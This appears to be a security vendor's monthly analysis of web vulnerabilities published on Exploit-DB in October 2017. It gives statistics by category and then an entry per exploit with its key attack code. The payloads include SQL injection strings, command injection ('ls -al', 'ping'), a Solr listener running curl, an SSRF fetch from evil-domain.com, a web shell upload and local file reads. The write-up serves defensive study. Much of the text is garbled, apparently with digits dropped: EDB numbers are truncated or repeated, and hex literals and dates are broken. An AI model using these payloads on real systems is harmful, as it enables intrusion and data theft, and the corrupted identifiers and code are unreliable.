Analysis summary (prepared by: Penta Security Systems, Security Evaluation Team)

A total of 67 web vulnerabilities were published on Exploit-DB in October 2017. Of these, SQL Injection attacks were the most numerous at 51. The highest-risk attack type this month was Command Injection. A Command Injection attack lets an attacker execute unintended system commands; the attacks published this month mainly 1) used multipart/form-data, 2) inserted commands in JSON format, 3) obfuscated commands with base64 and hashes, and 4) referenced an XML file containing the injected commands. To prevent these attacks and maintain security over time, defense in depth should be implemented through a web application firewall, secure coding and up-to-date patching.

1. Number of reports by category

Category                 Reports
RFI                            1
Information Disclosure         1
File Upload                    2
LFI                            2
XSS                            4
Command Injection              6
SQL Injection                 51
Total                         67

(Chart: number of reports by category)

2. Classification by risk level

Risk level    Reports    Percentage
High              61        91.04%
Medium             5         7.46%
Low                1         1.49%
Total             67       100.00%

(Chart: classification by risk level)

3. Status by attack difficulty

Attack difficulty    Reports    Percentage
High                      8        11.94%
Medium                   37        55.22%
Low                      22        32.84%
Total                    67       100.00%

(Chart: status by attack difficulty)

4. Occurrences by major software

Software                                   Reports
Wordpress                                        2
PG All Share Video                               2
Joomla                                           2
KeystoneJS                                       2
ClipBucket                                       1
tpanel                                           1
Complain Management System                       1
Apache Tomcat                                    1
Website Broker                                   1
EPESI                                            1
itech Gigs                                       1
ClipShare                                        1
Vastal I-Tech Agent Zone                         1
Trend Micro OfficeScan                           1
AROX School ERP PHP Script                       1
Logitech Media Server                            1
FS Thumbtack                                     1
3CX Phone System                                 1
Article Directory                                1
Career Portal                                    1
Mailing List Manager Pro                         1
Apache Solr                                      1
Same Sex Dating Software Pro                     1
Afian AB FileRun                                 1
SoftDatepro Dating Social Network                1
Check_MK                                         1
ZeeBuddy                                         1
CometChat                                        1
US Zip Codes Database                            1
Kaltura                                          1
FS Trademe                                       1
Mura CMS                                         1
FS Shutter Stock                                 1
PHPMyFAQ                                         1
D-Park Pro                                       1
FS OLX                                           1
PHP Melody                                       1
FS Lynda                                         1
Adult Pro                                        1
FS Indiamart                                     1
iproject Management System                       1
FS Groupon                                       1
Job Board                                        1
FS Freelancer                                    1
MyBuilder                                        1
FS Expedia                                       1
PHP CityPortal                                   1
FS Food Delivery                                 1
Online Exam Test Application                     1
FS Ebay                                          1
Zomato                                           1
FS Book Store                                    1
Sokial Social Network Script                     1
FS Amazon                                        1
Vastal I-Tech Dating Zone                        1
FS Car Rental                                    1
Protected Links                                  1
FS Realtor                                       1
Shareet                                          1
FS Crowdfunding                                  1
Newspaper                                        1
FS Care                                          1
FS Monster                                       1
Total                                           67

(Chart: occurrences by major software)
5. Details of the published vulnerabilities

Columns: Date | EDB No. | Category | Attack difficulty | Attack risk | Name | Key attack code | Target program | Target environment

2017-10-03 | EDB 42950 | XSS | Difficulty: Medium | Risk: Medium
Name: EPESI 1.8.2 rev20170830 - XSS
Target program / environment: EPESI / EPESI 1.8.2 rev20170830
Key attack code:
    POST /process.php HTTP/1.1

    history&url=_qf libs_qf_28b0ed42922c7ee22809bd346 95%3D%26submited%3D%26title%3D%253Ci%2520onclick%253dalert()%253ealertme%253c%252fi%253e%26 status%3d0%26priority%3d%26permission%3d0%26longterm%3d0%26deadline%255b date%255d%255bh%255D%3D0%26deadline%255B date%255d%255bi%255d%3D0%26deadline%255B datepicker%255d%3d%26timeless%3d0%26employees%3d SEP 2%26customers search %3D%26customers%3D%26description%3D%26 action_module %3D%252FBase_Box%257C0%252FUtils_RecordBrowser%257c5a323279e884f9fee3d734ad00393b_r

2017-10-04 | EDB 42954 | Command Injection | Difficulty: High | Risk: High
Name: ClipBucket 2.8.3 - Remote Code Execution
Target program / environment: ClipBucket / ClipBucket 2.8.3
Key attack code:
    POST /api/file_uploader.php HTTP/1.1
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 298
    Content-Type: multipart/form-data; boundary=2c2daae8c4d24d89840aa52253d280b

    --2c2daae8c4d24d89840aa52253d280b
    Content-Disposition: form-data; name="file_name"

    a.jpg;ls -al>../cache/.log;a.jpg
    --2c2daae8c4d24d89840aa52253d280b
    Content-Disposition: form-data; name="filedata"; filename="temp.jpg"
    Content-Type: image/jpg

    --2c2daae8c4d24d89840aa52253d280b--

2017-10-09 | EDB 42967 | SQL Injection | Difficulty: Medium | Risk: High
Name: ClipShare 7.0 - SQL Injection
Target program / environment: ClipShare / ClipShare 7.0
Key attack code:
    /videos/animals' AND 5593=5593 AND 'LJPS'='LJPS

2017-10-09 | EDB 42966 | File Upload | Difficulty: Medium | Risk: High
Name: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - File Upload
Target program / environment: Apache Tomcat / Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8
Key attack code:
    PUT /Poc.jsp HTTP/1.1

    <% out.println("aaaaaaaaaaaaaaaaaaaaaaaaaaaaa");%>

2017-10-10 | EDB 42968 | SQL Injection | Difficulty: Low | Risk: High
Name: Complain Management System - SQL Injection
Target program / environment: Complain Management System / Complain Management System
Key attack code:
    /index.php?mod=admin&view=repod&id=plans WHERE 337=337 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x776767a7,(SELECT (ELT(4063=4063,))),0x77076627,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
2017-10-11 | EDB 4297 | Command Injection | Difficulty: High | Risk: High
Name: Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution
Target program / environment: Trend Micro OfficeScan / Trend Micro OfficeScan 11.0/XG (12.0)
Key attack code:
    POST /officescan/console/html/widget/proxy_controller.php HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Cookie: LANG=en_US; LogonUser=root; wf_csrf_token=fb5b76f53eb8ea670c3f2d4906ff098; PHPSESSID=edir98ccf773n733cd3jvtor5;
    X-CSRFToken: fb5b76f53eb8ea670c3f2d4906ff098
    ctype: application/x-www-form-urlencoded; charset=utf-8
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 602

    module=modtmcss&serverid=&top=2>& ping 4.4.4.4

2017-10-14 | EDB 43024 | XSS | Difficulty: Low | Risk: High
Name: Logitech Media Server - XSS
Target program / environment: Logitech Media Server / Logitech Media Server
Key attack code:
    GET /%3Cbody%20onload=alert('Xss')%3E

2017-10-16 | EDB 4299 | LFI | Difficulty: Low | Risk: Medium
Name: 3CX Phone System 15.5.3554.1 - Information Disclosure
Target program / environment: 3CX Phone System / 3CX Phone System 15.5.3554.1
Key attack code:
    /api/supportinfo?file=/var/lib/3cxpbx/instance/bin/3cxphoneSystem.ini

2017-10-17 | EDB 4302 | SQL Injection | Difficulty: Low | Risk: High
Name: Wordpress Plugin Car Park Booking - SQL Injection
Target program / environment: Wordpress / Wordpress Plugin Car Park Booking
Key attack code:
    /booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=2

2017-10-17 | EDB 430 | SQL Injection | Difficulty: Medium | Risk: High
Name: Career Portal 1.0 - SQL Injection
Target program / environment: Career Portal / Career Portal 1.0
Key attack code:
    POST /job HTTP/1.1

    keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x76b6a77,0x59454764645472686855056467764674e59726f4252436844774f4704a507353574e4b6d5a5973,0x7787a787),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zand&location_name[]=
2017-10-17 | EDB 43009 | Command Injection | Difficulty: High | Risk: High
Name: Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
Target program / environment: Apache Solr / Apache Solr 7.0.1
Key attack code:
    POST /solr/newcollection/config HTTP/1.1

    {
      "add-listener" : {
        "event":"postcommit",
        "name":"newlistener",
        "class":"solr.runexecutablelistener",
        "exe":"curl",
        "dir":"/usr/bin/",
        "args":["http://localhost:4444/executed"]
      }
    }

2017-10-18 | EDB 4305 | File Upload | Difficulty: Low | Risk: High
Name: Afian AB FileRun 2017.03.18 - File Upload
Target program / environment: Afian AB FileRun / Afian AB FileRun 2017.03.18
Key attack code:
    POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd0029908f2

    -----------------------------7dd0029908f2
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: application/octet-stream

    *web shell payload here*
    -----------------------------7dd0029908f2--

2017-10-18 | EDB 4302 | Information Disclosure | Difficulty: High | Risk: Medium
Name: Check_MK 1.2.8p25 - Information Disclosure
Target program / environment: Check_MK / Check_MK 1.2.8p25
Key attack code:
    POST /check_mk/login.py HTTP/1.1
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd0029908f2

    ---------------------------7dd0029908f2
    Content-Disposition: form-data; name="filled_in"

    login
    ---------------------------7dd0029908f2
    Content-Disposition: form-data; name="_login"

    ---------------------------7dd0029908f2
    Content-Disposition: form-data; name="_origtarget"

2017-10-22 | EDB 43027 | LFI | Difficulty: Medium | Risk: Low
Name: CometChat < 6.2.0 BETA - Local File Inclusion
Target program / environment: CometChat / CometChat < 6.2.0 BETA
Key attack code:
    GET /cometchat/config.php?cmd=id HTTP/1.1
    Connection: keep-alive
    Cookie: cc_lang=../../etc/hosts

2017-10-23 | EDB 43028 | Command Injection | Difficulty: High | Risk: High
Name: Kaltura < 13.1.0 - Remote Code Execution
Target program / environment: Kaltura / Kaltura < 13.1.0
Key attack code:
    GET /index.php/keditorservices/getallentries?list_type=5&entry_id=0_abc234 HTTP/1.1
    Accept-Encoding: identity
    Cookie: userzone=[base64-encoded serialized PHP object with trailing signature; the encoded blob is omitted here]
    User-Agent: Python-urllib/3.5
2017-10-23 | EDB 43044 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS OLX - 'catg_id' SQL Injection
Target program / environment: FS OLX / FS OLX
Key attack code:
    /search-result.php?searchbox=search&catg_id=5' AND 4453=4453 AND 'QlZa'='QlZa

2017-10-23 | EDB 43043 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Lynda - 'category' SQL Injection
Target program / environment: FS Lynda / FS Lynda
Key attack code:
    POST /tutorial/ HTTP/1.1

    category=5 AND 845=845&keywords=xxxxx

2017-10-23 | EDB 43042 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Indiamart - 'keywords' SQL Injection
Target program / environment: FS Indiamart / FS Indiamart
Key attack code:
    /search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x76b78707,0x50696776c6f7955068694b454e736668707675627448527949566e434472706a72624a466a5468,0x776277)-- LEhA&rctyp=Products

2017-10-23 | EDB 4304 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Groupon - 'category' SQL Injection
Target program / environment: FS Groupon / FS Groupon
Key attack code:
    /search_product.php?category= AND 832=832&name=xxxxx

2017-10-23 | EDB 43040 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Freelancer - 'sk' SQL Injection
Target program / environment: FS Freelancer / FS Freelancer
Key attack code:
    /category.php?sk=2 AND 5895=5895
2017-10-23 | EDB 43039 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Expedia - 'hid' SQL Injection
Target program / environment: FS Expedia / FS Expedia
Key attack code:
    /hotel.php?hid=2 AND 6652=6652

2017-10-23 | EDB 43038 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Food Delivery - 'keywords' SQL Injection
Target program / environment: FS Food Delivery / FS Food Delivery
Key attack code:
    POST /food/ HTTP/1.1

    keywords=xxxxx' AND (SELECT 2438 FROM(SELECT COUNT(*),CONCAT(0x77a786a7,(SELECT (ELT(2438=2438,))),0x7627787,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TkKa'='TkKa&order_option=&category=&price=000

2017-10-23 | EDB 43037 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Ebay - 'pd_maincat_id' Parameter SQL Injection
Target program / environment: FS Ebay / FS Ebay
Key attack code:
    /advance-search-result.php?keywords=any&pd_maincat_id=' AND 730=730 AND 'ixuk'='ixuk&submit=search

2017-10-23 | EDB 43036 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Book Store - 'category' SQL Injection
Target program / environment: FS Book Store / FS Book Store
Key attack code:
    /book_search.php?book_name=xxxxx&category=4 AND SLEEP(5)

2017-10-23 | EDB 43035 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Amazon - 'category_id' SQL Injection
Target program / environment: FS Amazon / FS Amazon
Key attack code:
    /search.php?category_id= AND 2635=2635&sub_category_id=&search=xxxxx
2017-10-23 | EDB 43034 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Car Rental - 'pickup_location' SQL Injection
Target program / environment: FS Car Rental / FS Car Rental
Key attack code:
    POST /vehicle/ HTTP/1.1

    pickup_location=7 AND (SELECT 7390 FROM(SELECT COUNT(*),CONCAT(0x77878767,(SELECT (ELT(7390=7390,))),0x7766a6a7,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&pickup_date=207-0-24 2:9:35&dropoff_date=207-0-24 2:9:36

2017-10-24 | EDB 43052 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Realtor - 'id' SQL Injection
Target program / environment: FS Realtor / FS Realtor
Key attack code:
    /property_detail.php?id=29 AND 4599=4599

2017-10-24 | EDB 4305 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Crowdfunding - 'id' SQL Injection
Target program / environment: FS Crowdfunding / FS Crowdfunding
Key attack code:
    /page_running_projects_details.php?id=' AND 539=539 AND 'Qkwz'='Qkwz

2017-10-24 | EDB 43050 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Care - 'sitterservice' SQL Injection
Target program / environment: FS Care / FS Care
Key attack code:
    /searchjob.php?sitterservice=' AND 2728=2728 AND 'fhir'='fhir

2017-10-24 | EDB 43049 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Monster - 'id' SQL Injection
Target program / environment: FS Monster / FS Monster
Key attack code:
    /Job_Details.php?id=6 AND 9364=9364
2017-10-24 | EDB 43048 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Trademe - 'id' SQL Injection
Target program / environment: FS Trademe / FS Trademe
Key attack code:
    /property_details.php?id=2 AND 366=366

2017-10-24 | EDB 43047 | SQL Injection | Difficulty: Low | Risk: High
Name: FS Thumbtack - 'ser' SQL Injection
Target program / environment: FS Thumbtack / FS Thumbtack
Key attack code:
    /service-provider.php?ser=963' AND 860=860 AND 'ZarH'='ZarH

2017-10-24 | EDB 43046 | SQL Injection | Difficulty: Medium | Risk: High
Name: FS Shutter Stock - 'keywords' SQL Injection
Target program / environment: FS Shutter Stock / FS Shutter Stock
Key attack code:
    POST /Category/ HTTP/1.1

    keywords=search' AND (SELECT 2673 FROM(SELECT COUNT(*),CONCAT(0x76b706b7,(SELECT (ELT(2673=2673,))),0x7767a6b7,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UqZI'='UqZI&category=3

2017-10-24 | EDB 43045 | RFI | Difficulty: High | Risk: High
Name: Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity
Target program / environment: Mura CMS / Mura CMS < 6.2
Key attack code:
    /tasks/feed/readrss.cfm?siteid=sitenamehere&rssurl=http://evil-domain.com/file.xml&maxrssitems=500
2017-10-25 | EDB 43054 | XSS | Difficulty: Low | Risk: Medium
Name: KeystoneJS 4.0.0-beta.5 - XSS
Target program / environment: KeystoneJS / KeystoneJS 4.0.0-beta.5
Key attack code:
    POST /contact HTTP/1.1
    Proxy-Connection: keep-alive
    Content-Length: 55
    Cache-Control: max-age=0
    Origin: http://demo.keystonejs.com
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://demo.keystonejs.com/contact
    Accept-Encoding: gzip, deflate
    Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.6,en;q=0.4
    Cookie: language=en-us; this.sid=s%3axceh-47H7d7iMsqSlbWKu6O503shViQv.EGD7m4ee4Hidmm0kG0Swj0n3kw38zq9kk2tdkzl%2bhpe; _cb_ls=; XSRF-TOKEN=oeJbz4SQn76540082cab675d96a48e963d507d4ce4fc7878b0; _ga=ga.2.8680866.508992556; _gid=ga.2.87506328.508992556; _cb=dxjgsdf_ctpb3kzz6; _chartbeat2=.50899258232.50899299653..bk_mb5dnxq69dkyrg0udhhlx2bkb;

2017-10-25 | EDB 43053 | Command Injection | Difficulty: High | Risk: High
Name: KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection
Target program / environment: KeystoneJS / KeystoneJS 4.0.0-beta.5
Key attack code:
    /keystone/api/galleries/export.csv?select=key,=cmd '/S'!A&sort=&expandrelationshipfields=true

2017-10-28 | EDB 43063 | XSS | Difficulty: Medium | Risk: Medium
Name: PHPMyFAQ 2.9.8 - XSS
Target program / environment: PHPMyFAQ / PHPMyFAQ 2.9.8
Key attack code:
    POST /admin/attachment.php?action=save HTTP/1.1
    Proxy-Connection: keep-alive
    Content-Length: 855
    Cache-Control: max-age=0
    Origin: http://jen.demo.phpmyfaq.de
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKBj7nz2MHqNGoOt
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://jen.demo.phpmyfaq.de/admin/attachment.php?record_id=2&record_lang=ko
    Accept-Encoding: gzip, deflate
    Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.6,en;q=0.4
    Cookie: pmf_sid=82; PHPSESSID=q2ovk43mqr6r3isoc7bgm2ttl0

    ------WebKitFormBoundaryKBj7nz2MHqNGoOt
    Content-Disposition: form-data; name="max_file_size"

2017-10-28 | EDB 43062 | SQL Injection | Difficulty: Medium | Risk: High
Name: PHP Melody 2.6.1 - SQL Injection
Target program / environment: PHP Melody / PHP Melody 2.6.1
Key attack code:
    /playlists.php?playlist=' UNION SELECT null,concat(0x223c2f63e3c2f6469763e3c2f6469763e,version(),0x3c22d2d),null,null,null,null,null,null,null,null,null--
2017-10-30 | EDB 430 | SQL Injection | Difficulty: Medium | Risk: High
Name: D-Park Pro 1.0 - SQL Injection
Target program / environment: D-Park Pro / D-Park Pro 1.0
Key attack code:
    POST /admin/loginform.php HTTP/1.1

    username=' UNION ALL SELECT 0x3,0x32,0x33,CONCAT(0x49485344e2053454e4344e)-- Ver Ayari&password=234567

2017-10-30 | EDB 4300 | SQL Injection | Difficulty: Medium | Risk: High
Name: Adult Pro 2.2.4 - SQL Injection
Target program / environment: Adult Pro / Adult Pro 2.2.4
Key attack code:
    /download/verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x76a77a7,(SELECT (ELT(4247=4247,))),0x77a70707,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

2017-10-30 | EDB 43099 | SQL Injection | Difficulty: Medium | Risk: High
Name: Article Directory 3.0 - 'id' SQL Injection
Target program / environment: Article Directory / Article Directory 3.0
Key attack code:
    /category.php?id=8++/*!02222union*/+(/*!02222select*/+0x28329,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--

2017-10-30 | EDB 43098 | SQL Injection | Difficulty: Low | Risk: High
Name: iproject Management System 1.0 - 'ID' SQL Injection
Target program / environment: iproject Management System / iproject Management System 1.0
Key attack code:
    /index.php?cmd=agent&mod=true&id=%20and%20=--

2017-10-30 | EDB 43096 | SQL Injection | Difficulty: Medium | Risk: High
Name: itech Gigs 1.2 - SQL Injection
Target program / environment: itech Gigs / itech Gigs 1.2
Key attack code:
    /browse-scategory.php?sc=-2c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x28329,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x2833029)--
2017-10-30 | EDB 43095 | SQL Injection | Difficulty: Low | Risk: High
Name: Job Board - 'nice_theme' SQL Injection
Target program / environment: Job Board / Job Board
Key attack code:
    /index.php?nice_theme=%20and%20=--

2017-10-30 | EDB 43094 | SQL Injection | Difficulty: Medium | Risk: High
Name: Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection
Target program / environment: Joomla / Joomla! Component NS Download Shop 2.2.6
Key attack code:
    /index.php?option=com_ns_downloadshop&task=invoice.create&id=(select (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END))

2017-10-30 | EDB 43093 | SQL Injection | Difficulty: Medium | Risk: High
Name: Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection
Target program / environment: Joomla / Joomla! Component Zh YandexMap 6.1.1.0
Key attack code:
    /index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-864) OR 503=503

2017-10-30 | EDB 43092 | SQL Injection | Difficulty: Medium | Risk: High
Name: Mailing List Manager Pro 3.0 - SQL Injection
Target program / environment: Mailing List Manager Pro / Mailing List Manager Pro 3.0
Key attack code:
    /admin/users/?sort=login&edit=-2'++/*!03333UNION*/(/*!03333SELECT*/0x28329,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x2833029,0x283329,0x2833229,0x2833329,0x2833429)--

2017-10-30 | EDB 4309 | SQL Injection | Difficulty: Medium | Risk: High
Name: MyBuilder 1.0 - 'subcategory' SQL Injection
Target program / environment: MyBuilder / MyBuilder 1.0
Key attack code:
    /phpsqlsearch_genxml.php?subcategory='++and(/*!09999sELeCT*/+0x3078333+/*!09999FrOM*/+(/*!09999SeLeCT*/+count(*),/*!09999concat*/((select(select+/*!09999coNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x49687366E53656e6366e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,),fLOOR(rAND(0)*2))x+from+information_schema.tables+group+by+x)a) AND ''='
2017-10-30 | EDB 43090 | SQL Injection | Difficulty: Medium | Risk: High
Name: PG All Share Video 1.0 - SQL Injection
Target program / environment: PG All Share Video / PG All Share Video 1.0
Key attack code:
    /search/tag/verayari' AND 2686=2686 AND 'UsmZ'='UsmZ

2017-10-30 | EDB 43089 | SQL Injection | Difficulty: Medium | Risk: High
Name: PHP CityPortal 2.0 - SQL Injection
Target program / environment: PHP CityPortal / PHP CityPortal 2.0
Key attack code:
    /index.php?page=news&nid=' OR NOT 666=666#

2017-10-30 | EDB 43088 | SQL Injection | Difficulty: Medium | Risk: High
Name: Same Sex Dating Software Pro 1.0 - SQL Injection
Target program / environment: Same Sex Dating Software Pro / Same Sex Dating Software Pro 1.0
Key attack code:
    /viewmessage.php?sender_id=-263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x3,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x330,0x33,0x332,0x333,0x334,0x335,0x336--

2017-10-30 | EDB 43070 | SQL Injection | Difficulty: Medium | Risk: High
Name: Online Exam Test Application - 'sort' SQL Injection
Target program / environment: Online Exam Test Application / Online Exam Test Application
Key attack code:
    /resources.php?action=category&sort=-8++/*!07777UNION*/+/*!07777SELECT*/+0x3,0x32,0x49687366e2053656e6366e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--

2017-10-30 | EDB 43068 | SQL Injection | Difficulty: Low | Risk: High
Name: Vastal I-Tech Agent Zone - SQL Injection
Target program / environment: Vastal I-Tech Agent Zone / Vastal I-Tech Agent Zone
Key attack code:
    /searchcommercial.php?property_type=&city=-769 OR GROUP BY CONCAT(0x7778767,(SELECT (CASE WHEN (2860=2860) THEN ELSE 0 END)),0x7766a707,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by=
2017-10-30 | EDB 43067 | SQL Injection | Difficulty: Medium | Risk: High
Name: Website Broker - 'status_id' SQL Injection
Target program / environment: Website Broker / Website Broker
Key attack code:
    /status_list.php?status_id=-2'++/*!50000UNION*/+/*!50000SELECT*/+,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--

2017-10-30 | EDB 43066 | SQL Injection | Difficulty: Low | Risk: High
Name: Zomato - 'resid' SQL Injection
Target program / environment: Zomato / Zomato
Key attack code:
    /restaurant-menu.php?resid=-539'+++/*!02222UNION*/+/*!02222SELECT*/+0x3,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x330,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x332,0x333,0x334--

2017-10-30 | EDB 43065 | Command Injection | Difficulty: High | Risk: High
Name: WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection
Target program / environment: Wordpress / WordPress Plugin Ultimate Product Catalog 4.2.24
Key attack code:
    GET http://vbox-ubuntu-server.me/wordpress/wpadmin/admin-ajax.php?action=upcp_add_to_car HTTP/1.1
    Content-type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Cookie: upcp_cart_products=o:20: PHP_Object_Injection ::{s:7: host_ip ;s:4: ls -la ;}

2017-10-30 | EDB 43087 | SQL Injection | Difficulty: Medium | Risk: High
Name: SoftDatepro Dating Social Network 1.3 - SQL Injection
Target program / environment: SoftDatepro Dating Social Network / SoftDatepro Dating Social Network 1.3
Key attack code:
    /viewmessage.php?sender_id=-263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x3,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x330,0x33,0x332,0x333,0x334,0x335,0x336--

2017-10-30 | EDB 43086 | SQL Injection | Difficulty: Medium | Risk: High
Name: Sokial Social Network 1.0 - SQL Injection
Target program / environment: Sokial Social Network / Sokial Social Network 1.0
Key attack code:
    /admin/members_view.php?id=227+and(/*!00033select*/+0x3078333+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x49687366e53656e6366e))+/*!00033from*/+inforMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+=
2017-10-30 | EDB 43085 | SQL Injection | Difficulty: Low | Risk: High
Name: tpanel 2009 - SQL Injection
Target program / environment: tpanel / tpanel 2009
Key attack code:
    POST /login.php HTTP/1.1

    User= 'or = or ''='&Pass=23456

2017-10-30 | EDB 43084 | SQL Injection | Difficulty: Medium | Risk: High
Name: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection
Target program / environment: Vastal I-Tech Dating Zone / Vastal I-Tech Dating Zone 0.9.9
Key attack code:
    /add_to_cart.php?product_id=product_id=3 AND (SELECT 597 FROM(SELECT COUNT(*),CONCAT(0x776626a7,(SELECT (ELT(597=597,))),0x776b77,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

2017-10-30 | EDB 43083 | SQL Injection | Difficulty: Medium | Risk: High
Name: ZeeBuddy 2x - 'groupid' SQL Injection
Target program / environment: ZeeBuddy / ZeeBuddy 2x
Key attack code:
